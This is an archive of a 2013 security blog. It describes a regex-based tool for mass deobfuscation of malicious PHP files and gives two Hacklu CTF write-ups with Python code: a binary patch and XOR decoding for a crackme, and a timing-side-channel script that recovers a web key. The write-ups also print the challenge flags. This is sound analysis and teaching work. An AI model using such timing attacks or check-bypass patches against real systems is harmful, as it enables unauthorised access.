The Cake is a Lie: October 2013

Monday, October 28, 2013

Transformer: mass deobfuscation of php files

In my job I have to deal with tons of malicious PHP files per day, let's say about 1000. Most of them are obfuscated in various ways, from php-crypt.com up to amateur obfuscation.
Now, if you have to deobfuscate a single PHP file, you have several options, from web services to Stefan Esser's great evalhook PHP extension. These strategies all work well for a single file, because all of them require user interaction. But what if you have more than 1000 PHP files per day, and you want to deobfuscate them daily so you can run a similarity tool on them?!

Let's begin with the basics:
In PHP there are basically two ways to deobfuscate a piece of code and then execute it:
- simple eval function;
- preg_replace with the "e" modifier (dear PHP developers, was that really necessary!? a preg_replace with a built-in eval!?);
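You can find the first case with a plain text search. The second depends on the modifiers that come after the pattern's closing delimiter. Here is a minimal Python sketch of that check. It assumes the pattern is available as a plain string. has_e_modifier is a hypothetical helper and is not part of evalhook or Transformer:

```python
# PHP lets bracket pairs act as regex delimiters; any other delimiter closes itself.
BRACKET_CLOSERS = {"(": ")", "[": "]", "{": "}", "<": ">"}

def has_e_modifier(pattern: str) -> bool:
    """Return True if a PHP regex literal such as '/(.*)/e' carries the e modifier."""
    pattern = pattern.strip()
    if not pattern:
        return False
    closer = BRACKET_CLOSERS.get(pattern[0], pattern[0])
    end = pattern.rfind(closer)  # modifiers follow the last closing delimiter
    if end <= 0:
        return False
    return "e" in pattern[end + 1:]

for p in ("/(.*)/e", "#abc#ie", "/e/i"):
    print(p, has_e_modifier(p))  # True, True, False
```

Note that an "e" inside the pattern body, as in "/e/i", is correctly ignored.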

Using the evalhook extension on a large number of files causes two kinds of problems:
- for every "eval" step, evalhook asks for confirmation before evaluating the code (and that's OK, we can easily automate a "yes" answer);
- the file is actually executed while it is being analyzed (and that's not OK at all!)

So what I basically wanted was a way to run evalhook automatically over my 1000 files per day. At the same time, I didn't want to execute any part of the code beyond what is strictly necessary for evalhook to do its job.

Typical example of evalhook usage

This is especially important for files created by one author and then used by several others. Most of the web shells I see contain a tiny base64 string that is evaluated at run time. Its job is to send an e-mail to the creator of the shell (not the person actually using it), telling him that his shell has been uploaded to a certain server. If we run this kind of file through evalhook and let it deobfuscate everything, it will blindly execute all the code up to the point where it reaches the obfuscated part. That can cause all sorts of damage to the testing machine.

That's why I created Transformer. Its principle is exactly the one described above. It explores the code, looks for every eval and every preg_replace with "e", and isolates them. It then runs evalhook on these single pieces and puts the results back into the code, which gives a safer and better deobfuscation.

Details

Transformer runs a set of regexes over the file to find possible matches (yes, you understood correctly: it's regex-based). A regex approach obviously has some limitations inherent to regexes. Still, it's the only way to isolate the obfuscated parts of a file without writing a PHP parser (a very, very hard thing to do) or creating a PHP extension. We don't want any part of the code to run inside PHP, so that we are safe against any possible event.
An example of these regexes is listed below:
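The patterns below are not Transformer's own. They are a hypothetical Python sketch of what a character-level regex for the two entry points could look like. EVAL_RE, PREG_RE and find_sinks are made-up names. The lazy body stops at the first ")" followed by ";". That is an assumption: it copes with nested calls such as eval(base64_decode("...")); but breaks when a string inside the argument contains ");".

```python
import re

# Hypothetical patterns: the lazy body stops at the first ")" followed by ";",
# so nested calls work, but a string containing ");" would cut the match short.
EVAL_RE = re.compile(r"\beval\s*\((.*?)\)\s*;", re.DOTALL | re.IGNORECASE)
PREG_RE = re.compile(r"\bpreg_replace\s*\((.*?)\)\s*;", re.DOTALL | re.IGNORECASE)

def find_sinks(source: str) -> list:
    """Return sorted (start, end, kind, argument) tuples for eval/preg_replace calls."""
    hits = []
    for kind, regex in (("eval", EVAL_RE), ("preg_replace", PREG_RE)):
        for m in regex.finditer(source):
            hits.append((m.start(), m.end(), kind, m.group(1)))
    return sorted(hits)

sample = '<?php $x = 1; eval(base64_decode("ZWNobyAxOw==")); echo 2;'
print(find_sinks(sample))
```

Each hit keeps its offsets, so the isolated piece can later be swapped back into the file.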

Note that these regexes work on characters. In my experience, attackers often obfuscate their code in another way besides eval'ing things: they replace some of the characters with their hex equivalents. PHP happily accepts hex-encoded characters (escape sequences like \x65) inside strings, including strings used as function names.

half hex encoded half ascii!

That's why the whole code, before being split, passes through a "decode_hext" function. It decodes every hex-encoded character into the corresponding ASCII character.
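Here is a Python sketch of this decoding step. It assumes only \xHH escapes need handling. decode_hex_escapes is a hypothetical stand-in for decode_hext, whose actual code is not shown here:

```python
import re

# PHP double-quoted strings accept \x followed by one or two hex digits.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")

def decode_hex_escapes(source: str) -> str:
    """Replace every \\xHH escape in the raw source with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), source)

print(decode_hex_escapes(r'$f = "\x62\x61se64_\x64ecode";'))  # $f = "base64_decode";
```

Like any character-level pass, it also rewrites \x sequences that PHP would leave alone. Examples are those in single-quoted strings or after an escaped backslash. It also ignores octal escapes. Whether that matters depends on the sample.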

Once we have isolated the obfuscated part of the code, if we are lucky we just give it to evalhook and get the decoded version back. But what about things like

$a = obfuscated_string;
eval($a);

Transformer handles these cases with a minimal parse of the code. It does a sort of taint tracking on the variables involved in the obfuscated parts and attaches every operation involving those variables to the obfuscated code. This is particularly useful against custom obfuscation schemes, which obfuscate the code with XOR and other operations (I have even seen something similar to a Caesar cipher).
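Here is a rough Python sketch of this tainting idea. It assumes simple assignments that end in ";". ASSIGN_RE and collect_tainted are hypothetical names. The sketch deliberately ignores control flow (loops, ifs, function bodies), which is one reason this kind of approach fails on multi-line helper functions:

```python
import re

VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
# "$name = ...;" or a compound form such as "$name .= ...;" / "$name ^= ...;".
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*[.^+\-*|&]?=(?!=)[^;]*;")

def collect_tainted(source: str, sink_arg: str) -> list:
    """Return, in source order, the assignments feeding the variables used in sink_arg."""
    assignments = [(m.group(1), m.group(0)) for m in ASSIGN_RE.finditer(source)]
    tainted = set(VAR_RE.findall(sink_arg))
    changed = True
    while changed:  # keep propagating until no new variable gets tainted
        changed = False
        for name, stmt in assignments:
            if name in tainted:
                new_vars = set(VAR_RE.findall(stmt)) - tainted
                if new_vars:
                    tainted |= new_vars
                    changed = True
    return [stmt for name, stmt in assignments if name in tainted]

php = '$junk = 1;\n$p = "ZWNobyAxOw==";\n$q = base64_decode($p);\neval($q);'
print(collect_tainted(php, "$q"))
# ['$p = "ZWNobyAxOw==";', '$q = base64_decode($p);']
```

The collected statements, followed by the original eval line, form the small script that is handed to evalhook.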

Once we have a script containing both the obfuscated code and every other operation on the variables used by the obfuscation, we let evalhook do its amazing job and get the deobfuscated code.

The output from evalhook is then put back inside the original code, replacing the obfuscated code.
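Putting the results back is mostly offset bookkeeping. Here is a minimal sketch. It assumes each isolated piece is known by its (start, end) offsets in the decoded file. It also assumes the evalhook output has already been captured as a string; how that capture works is not shown. splice is a hypothetical helper:

```python
def splice(source: str, replacements) -> str:
    """Replace non-overlapping (start, end, new_text) spans of source."""
    spans = sorted(replacements)
    for prev, cur in zip(spans, spans[1:]):
        if cur[0] < prev[1]:
            raise ValueError(f"overlapping spans {prev[:2]} and {cur[:2]}")
    out = source
    # Work from the end of the file backwards so earlier offsets stay valid.
    for start, end, new_text in reversed(spans):
        out = out[:start] + new_text + out[end:]
    return out

src = 'a(); eval(base64_decode("ZWNobyAxOw==")); b();'
start = src.index("eval")
end = src.index("; b") + 1
print(splice(src, [(start, end, "echo 1;")]))  # a(); echo 1; b();
```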

Where it works

Transformer is not meant to be a universal, perfect deobfuscator. Its strong point is decoding parts of scripts automatically: it catches every small obfuscated piece of code and produces the deobfuscated version. It works great when you have massive amounts of obfuscated files and need the deobfuscated versions to look for similarities between them.
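The post does not say which similarity tool is used. As one possible stand-in, Python's difflib can score pairs of deobfuscated files. similar_pairs and the 0.8 threshold are arbitrary choices for illustration:

```python
import difflib
from itertools import combinations

def similarity(a: str, b: str) -> float:
    """difflib's similarity ratio (2*M/T) between two texts, from 0.0 to 1.0."""
    return difflib.SequenceMatcher(None, a, b).ratio()

def similar_pairs(files: dict, threshold: float = 0.8) -> list:
    """Return (name1, name2, ratio) for every pair of files scoring >= threshold."""
    pairs = []
    for (n1, t1), (n2, t2) in combinations(sorted(files.items()), 2):
        ratio = similarity(t1, t2)
        if ratio >= threshold:
            pairs.append((n1, n2, ratio))
    return pairs

deobfuscated = {"a.php": "echo 1; mail($x);", "b.php": "echo 1; mail($y);", "c.php": "phpinfo();"}
print(similar_pairs(deobfuscated))
```

Pairwise comparison grows quadratically with the number of files. At around 1000 files per day, you would probably need a cheaper fingerprinting step in front of it.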

Where it fails

Transformer has no real knowledge of PHP. So if the obfuscated script goes through several multi-line functions before being evaluated, the deobfuscation will fail. There is also a piece of software that obfuscates scripts so that, during deobfuscation, the script reads itself several times. Each time it appends specific bytes one after another, building a new file that is then deobfuscated.
No automatic procedure can help in these cases. The deobfuscation must be done by hand, checking every single evalhook step to understand when to stop.

Conclusions

What I presented here is a nice way to automatically deobfuscate many different PHP files. Obviously it is not as precise as a manual analysis (and it isn't meant to be), but if you collect massive amounts of PHP scripts per day, it can be useful.
Of course I created a GitHub repo for the project. I still have to add some example files. The problem is that I only have malicious obfuscated files, which I don't want to publish on my GitHub, so I'm creating something ad hoc!

Notice: this tool is meant to give a safer deobfuscation than running evalhook on the whole script. Even so, I still recommend running it in a virtual machine with no connection to the outside world, to minimize possible dangers.

Sunday, October 27, 2013

Hacklu 2013 - Reverse 150 Write-up

Here we are: second post, second write-up.
We are going to analyze Reverse 150, a nice Win32 executable called RoboAuth. As always, at the end of this post you will find a link to a GitHub repo with the write-up and the original executable, so you can repeat the challenge.

Let's start!

The challenge description said that the flag should be written as flag1_flag2, so we expect some kind of double password check.

As always, we start with the "file" command to learn some details about the executable, and we get:

RoboAuth.exe: PE32 executable for MS Windows (console) Intel 80386 32-bit

OK, time for a Windows VM!

Launching it gives you this nice introduction, followed by a request for a password.

Very nice, let's see if we find something interesting in the strings of the program.
The Strings view in IDA shows us where the initial text and the "you passed level 1" string are located inside the executable, nice!
Looking at the code around the "you passed level 1" string, we see A LOT of mov instructions and finally what every password cracker wants to see:
scanf
strcmp
puts

Hey, that's easy! Now we know that the program simply reads at most 20 chars, checks them against a fixed string and prints the result. We just need to run it in a debugger, stop at that point and look at the compared values.
Personally, I do static analysis in IDA and dynamic analysis in OllyDbg, because I think the IDA Pro debugger sucks. So here is the screenshot of the memory dump from Olly:

Great!
Now we have the first password, "R0b0RUlez!". OK, let's move on!

After the first password we are requested for a second one.
As before, we look for a string, but this time we can't find one. OK, so where is the second check?! Well, we know the second check is going to do a puts and a scanf, so let's look for those calls!
We discover that there is a second scanf in the function at 40157f, so let's look at it!

As we can see, there is a scanf as in the first password scenario, then a call to 401547, then a test followed by a puts, nice! The usual acquire, check, and decide-based-on-the-check pattern!
The problem is that when we put a breakpoint on the call sub_401547 instruction, the program doesn't stop there. Instead, we are stopped on an int 3 instruction.
Phew. As we could expect from the end of the previous function (ExitProcess), this means the second password is actually checked by another process launched by the parent. To debug it we would need some very nasty tricks etc. etc. (read: I am lazy, and if I have another way to get the same information, why shouldn't I use it!?).

So what can we do!? Well, we actually have the executable, so why not tamper with it? As we can see, the function sub_401547 takes its parameters from [esp+38h+var_34] and var_38. One of them is the string read by the scanf, and the other one is used during the check... probably our delightful password! The idea is to display it instead of the string printed by the puts after the check, bypassing the test (obviously). A bunch of NOPs and changing

mov eax, ds:dword_40ada4

into

mov eax, ds:dword_40ad98

will do the trick!
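The same patch can be scripted instead of done by hand in a hex editor. Here is a Python sketch. It assumes the instruction uses the short mov eax, moffs32 encoding: opcode A1 followed by the 4-byte address, little-endian. The compiler could also have emitted a longer form. The file offsets must be computed from the PE headers (for example, read from IDA), since none are given here. patch_dword and nop_out are hypothetical helpers:

```python
import struct

def patch_dword(image: bytearray, offset: int, expected: int, replacement: int) -> None:
    """Overwrite the 32-bit little-endian value at offset, after checking what is there."""
    old = struct.pack("<I", expected)
    if image[offset:offset + 4] != old:
        raise ValueError(f"unexpected bytes at offset {offset:#x}")
    image[offset:offset + 4] = struct.pack("<I", replacement)

def nop_out(image: bytearray, offset: int, length: int) -> None:
    """Overwrite length bytes at offset with 0x90, the one-byte x86 NOP."""
    image[offset:offset + length] = b"\x90" * length

# Demo on synthetic bytes, not on RoboAuth.exe: A1 <addr> = mov eax, [addr].
code = bytearray(b"\xa1\xa4\xad\x40\x00\xeb\x05")
patch_dword(code, 1, 0x40ADA4, 0x40AD98)  # dword_40ada4 -> dword_40ad98
nop_out(code, 5, 2)  # e.g. wipe a 2-byte jump that skips the display
print(code.hex())  # a198ad40009090
```

Checking the expected bytes before writing means a wrong offset fails loudly instead of silently corrupting the executable.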

Nice! Here is our beautiful string, "u1nnf2lg\x02" (\x02 being the little smiley face in the Win32 console).
Let's look at the check function:

Even better, the check just XORs every byte of the stored solution with 2 and compares it with our buffer, up to the \x02 byte. Reversing it is a one-line Python operation:

print("".join(chr(ord(c) ^ 2) for c in "u1nnf2lg"))

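and we obtain our second password, w3lld0ne (the "2" becomes a zero, since 0x32 XOR 2 = 0x30). Following the flag1_flag2 format, the full flag is R0b0RUlez!_w3lld0ne.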
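To double-check the result, the described check can be modeled in Python. This is a reconstruction from the description above, not a decompilation of sub_401547. Note that \x02 XOR 2 is 0x00, a C string terminator, which would explain why the comparison stops at that byte. decode_stored and check are hypothetical names:

```python
def decode_stored(stored: bytes, key: int = 2) -> str:
    """XOR every stored byte with key, stopping at the resulting NUL byte."""
    out = []
    for b in stored:
        c = b ^ key
        if c == 0:  # b"\x02" ^ 2 == 0, the end of the C string
            break
        out.append(chr(c))
    return "".join(out)

def check(user_input: str, stored: bytes = b"u1nnf2lg\x02") -> bool:
    """True when the input matches the decoded stored password."""
    return user_input == decode_stored(stored)

print(decode_stored(b"u1nnf2lg\x02"))  # w3lld0ne
print(check("w3lld0ne"), check("w3lldone"))  # True False
```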

I find tampering with an executable to display the memory content we need a really nice trick. It is especially handy when using a debugger would require tracing different processes etc.

Finally, here you will find the GitHub repo with the original file, the tampered file that displays the second password, and this write-up.

Enjoy!

Saturday, October 26, 2013

Presentation

Hi, my name is Maurizio Abbà. I'm an Information Technology Engineer with a deep interest in security. My main fields are Web Security and Reverse Engineering (yes, because we love opposites!). That means I spend most of my time (not counting sleeping, cooking and eating) writing code, looking at an IDA Pro graph, or figuring out how to script an operation that I probably won't repeat in the next five years but that I absolutely refuse to do by hand.
I love challenges, so I'll post most of my CTF write-ups here (starting from Hacklu 2013), always trying to improve myself. Check out my posts, and if you are interested, here is my latest CV (I'm always looking for a job, a collaboration or just a new challenge!): My Amazing CV

Hacklu 2013 - Web 200 writeup

Here we are, my first post.
What is the best way to begin a blog? With a write-up, of course!
So, I took part in Hacklu 2013, but I only managed to solve 4 challenges: Web 200, Reverse 150 and 400. The challenges were a lot of fun. I'm just sorry I wasted a lot of time on Web 150 without figuring out the solution (SQL injection in basic authentication!?! The Horror!).
So here is my write-up for Web 200: a very easy challenge in my opinion, but still fun!
So at first we are presented with this web page:

Just an image and an input box with a button: insert a key, and it displays "wrong answer".

First things first, let's look at the HTML code:

As you can see, we have a form that sends a POST request to /gimmetv with a key when the button is clicked. Below it there is a nice little script called key.js.
Let's take a look at the script then:

The script adds a listener to the submit event and sends our AJAX request to the server, receiving a JSON object containing a "success" field. The most interesting thing here is obviously the xhr.send call, which has a commented-out &debug parameter.

Sending the same request with the debug parameter gives us the same response with two new fields, "start" and "end". Looks like a timing attack!
Sending the request with different letters/numbers and looking at end-start, we see that the value is almost the same for every character but one. That one stands out with a significant difference of about 0.1.

The next step is natural then. Let's write a small Python script that grows the key one character at a time, keeping the character with the largest end-start value. It continues until "success" is true, and then we look at the response.

This code is not the most efficient, as it does not stop at the 0.1 threshold (I wanted to be sure to take the maximum and didn't care much about speed). It also checks punctuation characters (same reason: I wanted to be sure to get the right result).
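Here is a minimal Python 3 sketch of such a solver, written along the same lines: it tries the full alphabet including punctuation, keeps the maximum, and stops only on "success". The request format is an assumption based on the commented-out parameter: a form-encoded body "key=<candidate>&debug". http_measure, recover_key and the URL placeholder are hypothetical, and this is not the solver from the repo:

```python
import json
import string
import urllib.parse
import urllib.request

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def http_measure(url: str):
    """Build a measure(candidate) function for the endpoint (request format assumed)."""
    def measure(candidate: str):
        body = ("key=" + urllib.parse.quote(candidate, safe="") + "&debug").encode()
        with urllib.request.urlopen(url, data=body) as resp:  # data= makes it a POST
            reply = json.load(resp)
        return reply["success"], reply["end"] - reply["start"], reply
    return measure

def recover_key(measure, alphabet: str = ALPHABET, max_len: int = 64):
    """Grow the key one character at a time, keeping the slowest-to-reject candidate."""
    prefix = ""
    for _ in range(max_len):
        best_char, best_time = None, float("-inf")
        for c in alphabet:  # no early exit on the ~0.1 jump: always take the maximum
            success, elapsed, reply = measure(prefix + c)
            if success:
                return prefix + c, reply
            if elapsed > best_time:
                best_char, best_time = c, elapsed
        prefix += best_char
    raise RuntimeError("no key found within max_len characters")

# Hypothetical usage against the challenge server (host left as a placeholder):
# key, reply = recover_key(http_measure("http://<challenge-host>/gimmetv"))
# print(key, reply.get("response"))
```

Passing the measurement in as a function keeps the search logic testable offline against a fake oracle.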

In a matter of seconds we have the solution: in the "response" field of the JSON response we see "OH_THAT_ARTWORK!"

Maybe this challenge was too easy for 200 points. I expected something obfuscated (as far as I remember, last year all the JavaScript code was obfuscated), but still, it was a nice 5-minute exercise!

I created a github repo where you will find:
the write-up
the solver in Python
a server that replicates (more or less) the behavior of the original one, so that you can reproduce the challenge!

Enjoy!